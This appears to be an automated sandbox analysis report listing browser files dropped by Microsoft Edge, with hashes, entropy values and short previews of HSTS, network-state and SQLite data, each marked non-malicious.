                                                                                                                                                                                                                                                                                                                                                              SHA1:5A2B2F4151DED8DCA2639EFAD3E8C5CE3D9E554F
                                                                                                                                                                                                                                                                                                                                                              SHA-256:A4629A7A47883E0A67B9C7F20B8ECB18ED19A008DD1429D047C3DE72F4F36A16
                                                                                                                                                                                                                                                                                                                                                              SHA-512:E9535E597BEAC160DD0872F1E751F591F469BBBCFD438F5DBE948812AFF1CB948C7ADAAD574C2B67C226FF3251D741BC69CF0009F15D993997B7E9596C4842DC
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:43.214 1fd4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/02/18-02:16:43.215 1fd4 Recovering log #3.2025/02/18-02:16:43.218 1fd4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\0ed384b1-5693-4f83-937d-aafc77ed4331.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1023
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.529594780586748
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:YhnDEUq79RAeUF/7wUQSRejPWIEteUjeUpRdUEQ:YqUqJieUlEU9gj1EcUiUZUt
                                                                                                                                                                                                                                                                                                                                                              MD5:AD0A7ED3A724FAFC04668A5941CAB8C4
                                                                                                                                                                                                                                                                                                                                                              SHA1:C524DA07F25253F46347B126B7614B08CACA695F
                                                                                                                                                                                                                                                                                                                                                              SHA-256:F06471489D44D12FA564B0C5AD04C4391CB38009951F2C6B8342FDC8C75C3C38
                                                                                                                                                                                                                                                                                                                                                              SHA-512:2C455853634E0491FF5820592F9A01E836C999B775C3CE6FE92813E1D7565D669760A7C2C28DE839BD14A994D0221338F986989B0D2C0B5838C1C13BF6D3A785
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"sts":[{"expiry":1771399015.75695,"host":"FSrCCCgbSk94tpel8F2osMYZSqD3G8LcdQYQKv7WvPI=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1739863015.756955},{"expiry":1771399013.747914,"host":"M4bfUnCmQAi4PNb3B8aI/2+SVJhHKsMfMMT7fzi6ij4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1739863013.747918},{"expiry":1771399011.484632,"host":"R4fcRonab9q8ofkiF6a/nx3Xi2G9W1liJmg8W6yTFmo=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1739863011.484635},{"expiry":1771399014.599927,"host":"WY6KoNDPTe78tC/8QkuP6nj7NU/7OaY3z4ooalb+rq4=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1739863014.599932},{"expiry":1771399013.096226,"host":"pQ3smbAQxr6dM4VHbpg5gia+bTRSVz4p2rpusY1PJP0=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1739863013.096231},{"expiry":1771399014.69258,"host":"+loO+DGmT6DTr59JZFAnGSlBAwPkO5M/R9ec1Sw/9KA=","mode":"force-https","sts_include_subdomains":true,"sts_observed":173986301

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\6b9db13e-d37b-4c8e-9c63-b9535d9184c8.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1525
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.552487068253557
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:YhnDEUqb+UE79RAeUvz7wUQS1PWIEteUneUn+UwXmK7ozUCpRdUEQ:YqUqKUMieULEU911EcUeU+UwGUCZUt
                                                                                                                                                                                                                                                                                                                                                              MD5:99D508695D3221C5C218DD0BABEF8163
                                                                                                                                                                                                                                                                                                                                                              SHA1:0B20F03AF3056D7A76F5D672783505E9C103C0BC
                                                                                                                                                                                                                                                                                                                                                              SHA-256:50FF31CE96FB6191A0D137C043A51342AC95126423D2EFBB9A4F1F68EEBDD603
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5A26D245EBB0380D86BF0E46D6724F8232CDBDB46CA26694AAAB9CE03E28EF81F10696AEA026585A320FF157BDAD28A6E985B764402ACDE0145EF1C9C7556F2D
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"sts":[{"expiry":1771399015.75695,"host":"FSrCCCgbSk94tpel8F2osMYZSqD3G8LcdQYQKv7WvPI=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1739863015.756955},{"expiry":1771399023.470199,"host":"Hi4bEdMq563Qsqn4sVyUls/uVk7U80IxMa3wyWVUqWU=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1739863023.470202},{"expiry":1771399023.592313,"host":"M4bfUnCmQAi4PNb3B8aI/2+SVJhHKsMfMMT7fzi6ij4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1739863023.592317},{"expiry":1771399011.484632,"host":"R4fcRonab9q8ofkiF6a/nx3Xi2G9W1liJmg8W6yTFmo=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1739863011.484635},{"expiry":1771399043.806226,"host":"WY6KoNDPTe78tC/8QkuP6nj7NU/7OaY3z4ooalb+rq4=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1739863043.80623},{"expiry":1771399013.096226,"host":"pQ3smbAQxr6dM4VHbpg5gia+bTRSVz4p2rpusY1PJP0=","mode":"force-https","sts_include_subdomains":false,"sts_observed":17398630

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 15, database pages 9, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):36864
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.548055968628216
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:XA3N/F2Ke6FGIThydcYDigrSLuPSPOXZvQg/t:A/e6ziWPu6mXZvQI
                                                                                                                                                                                                                                                                                                                                                              MD5:3BB607754492834E214D2AC4BEEF287B
                                                                                                                                                                                                                                                                                                                                                              SHA1:593DDE732AC7EE3337F0868DEB1F7F2872307F67
                                                                                                                                                                                                                                                                                                                                                              SHA-256:37447060D2B9AEA381F4E5500B603F1E98D922CA9C4E2F5767A89E4D82532AFA
                                                                                                                                                                                                                                                                                                                                                              SHA-512:28915A045252B66B0CA20ED56EDDA1D9F3CC1A545EA369A7665ED26F3E55D6A57D665430B49250A3500505B8D6BB97AFF5E8D18491A93563695FA40CBC8DFA1C
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1453
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.300008301469919
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:YcCp/WRdsuZVMdmwC5mWRdsfZFRudFGRRds3ZFGJ/I3w6C1E6maPsQYhbd7nby:YcCpWsquCvsBfcKspgCgakhYhbg
                                                                                                                                                                                                                                                                                                                                                              MD5:6D62BD7FBF058BA973FD160EC7EECAF8
                                                                                                                                                                                                                                                                                                                                                              SHA1:7C6A2F7459CE570BC83DAF81A9C0BAA8EC60FA2D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:8D24CACEFBD3B56B7794CE5646E20848895A11BB6A8CC3C04E3880B0FEBE88B2
                                                                                                                                                                                                                                                                                                                                                              SHA-512:B510814BAC84C303D6CDD4238AF2A1026A0FF7FD3EA0BF7D05F00348D8A8AE75AA02F55D5C185309A05295C0D83E6C10B788CFB68BD8DA623CBFA2885273468E
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564963919255","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564964617465","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564974643939","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF3323c.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1453
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.300008301469919
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:YcCp/WRdsuZVMdmwC5mWRdsfZFRudFGRRds3ZFGJ/I3w6C1E6maPsQYhbd7nby:YcCpWsquCvsBfcKspgCgakhYhbg
                                                                                                                                                                                                                                                                                                                                                              MD5:6D62BD7FBF058BA973FD160EC7EECAF8
                                                                                                                                                                                                                                                                                                                                                              SHA1:7C6A2F7459CE570BC83DAF81A9C0BAA8EC60FA2D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:8D24CACEFBD3B56B7794CE5646E20848895A11BB6A8CC3C04E3880B0FEBE88B2
                                                                                                                                                                                                                                                                                                                                                              SHA-512:B510814BAC84C303D6CDD4238AF2A1026A0FF7FD3EA0BF7D05F00348D8A8AE75AA02F55D5C185309A05295C0D83E6C10B788CFB68BD8DA623CBFA2885273468E
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564963919255","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564964617465","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564974643939","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 13, cookie 0x4, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):53248
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.4727815215968074
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:aIEumQv8m1ccnvS62kvzy3iPCpKKbl68oEV54ktz2FoMzb53A4haN+7wal4+i0yl:TpX2krDCKvEVKkISMk+34+r7k9
                                                                                                                                                                                                                                                                                                                                                              MD5:FE9AD6AB1957C8D0D28FF3158B42B188
                                                                                                                                                                                                                                                                                                                                                              SHA1:B309452022B567FDBBB13FB82D3DA4A3A3293019
                                                                                                                                                                                                                                                                                                                                                              SHA-256:FEA4D52BC1FC5212DD484C858259261F14D43EDD7074C7E5F82344BF88AC7032
                                                                                                                                                                                                                                                                                                                                                              SHA-512:7C648E45C63E1E3ECFFA02E3A7FCF113A5F49C70F26A0DEAFB54533D84E0E7128A33BCCA82147FCD1C41DA9B39443D63212F84F4A13B91318967908D7A0C8543
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF232fd.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF240c8.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF26d56.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1023
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.529594780586748
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:YhnDEUq79RAeUF/7wUQSRejPWIEteUjeUpRdUEQ:YqUqJieUlEU9gj1EcUiUZUt
                                                                                                                                                                                                                                                                                                                                                              MD5:AD0A7ED3A724FAFC04668A5941CAB8C4
                                                                                                                                                                                                                                                                                                                                                              SHA1:C524DA07F25253F46347B126B7614B08CACA695F
                                                                                                                                                                                                                                                                                                                                                              SHA-256:F06471489D44D12FA564B0C5AD04C4391CB38009951F2C6B8342FDC8C75C3C38
                                                                                                                                                                                                                                                                                                                                                              SHA-512:2C455853634E0491FF5820592F9A01E836C999B775C3CE6FE92813E1D7565D669760A7C2C28DE839BD14A994D0221338F986989B0D2C0B5838C1C13BF6D3A785
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"sts":[{"expiry":1771399015.75695,"host":"FSrCCCgbSk94tpel8F2osMYZSqD3G8LcdQYQKv7WvPI=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1739863015.756955},{"expiry":1771399013.747914,"host":"M4bfUnCmQAi4PNb3B8aI/2+SVJhHKsMfMMT7fzi6ij4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1739863013.747918},{"expiry":1771399011.484632,"host":"R4fcRonab9q8ofkiF6a/nx3Xi2G9W1liJmg8W6yTFmo=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1739863011.484635},{"expiry":1771399014.599927,"host":"WY6KoNDPTe78tC/8QkuP6nj7NU/7OaY3z4ooalb+rq4=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1739863014.599932},{"expiry":1771399013.096226,"host":"pQ3smbAQxr6dM4VHbpg5gia+bTRSVz4p2rpusY1PJP0=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1739863013.096231},{"expiry":1771399014.69258,"host":"+loO+DGmT6DTr59JZFAnGSlBAwPkO5M/R9ec1Sw/9KA=","mode":"force-https","sts_include_subdomains":true,"sts_observed":173986301

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity~RF26b14.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1023
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.529594780586748
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:YhnDEUq79RAeUF/7wUQSRejPWIEteUjeUpRdUEQ:YqUqJieUlEU9gj1EcUiUZUt
                                                                                                                                                                                                                                                                                                                                                              MD5:AD0A7ED3A724FAFC04668A5941CAB8C4
                                                                                                                                                                                                                                                                                                                                                              SHA1:C524DA07F25253F46347B126B7614B08CACA695F
                                                                                                                                                                                                                                                                                                                                                              SHA-256:F06471489D44D12FA564B0C5AD04C4391CB38009951F2C6B8342FDC8C75C3C38
                                                                                                                                                                                                                                                                                                                                                              SHA-512:2C455853634E0491FF5820592F9A01E836C999B775C3CE6FE92813E1D7565D669760A7C2C28DE839BD14A994D0221338F986989B0D2C0B5838C1C13BF6D3A785
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"sts":[{"expiry":1771399015.75695,"host":"FSrCCCgbSk94tpel8F2osMYZSqD3G8LcdQYQKv7WvPI=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1739863015.756955},{"expiry":1771399013.747914,"host":"M4bfUnCmQAi4PNb3B8aI/2+SVJhHKsMfMMT7fzi6ij4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1739863013.747918},{"expiry":1771399011.484632,"host":"R4fcRonab9q8ofkiF6a/nx3Xi2G9W1liJmg8W6yTFmo=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1739863011.484635},{"expiry":1771399014.599927,"host":"WY6KoNDPTe78tC/8QkuP6nj7NU/7OaY3z4ooalb+rq4=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1739863014.599932},{"expiry":1771399013.096226,"host":"pQ3smbAQxr6dM4VHbpg5gia+bTRSVz4p2rpusY1PJP0=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1739863013.096231},{"expiry":1771399014.69258,"host":"+loO+DGmT6DTr59JZFAnGSlBAwPkO5M/R9ec1Sw/9KA=","mode":"force-https","sts_include_subdomains":true,"sts_observed":173986301

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity~RF2cefe.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1023
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.529594780586748
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:YhnDEUq79RAeUF/7wUQSRejPWIEteUjeUpRdUEQ:YqUqJieUlEU9gj1EcUiUZUt
                                                                                                                                                                                                                                                                                                                                                              MD5:AD0A7ED3A724FAFC04668A5941CAB8C4
                                                                                                                                                                                                                                                                                                                                                              SHA1:C524DA07F25253F46347B126B7614B08CACA695F
                                                                                                                                                                                                                                                                                                                                                              SHA-256:F06471489D44D12FA564B0C5AD04C4391CB38009951F2C6B8342FDC8C75C3C38
                                                                                                                                                                                                                                                                                                                                                              SHA-512:2C455853634E0491FF5820592F9A01E836C999B775C3CE6FE92813E1D7565D669760A7C2C28DE839BD14A994D0221338F986989B0D2C0B5838C1C13BF6D3A785
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
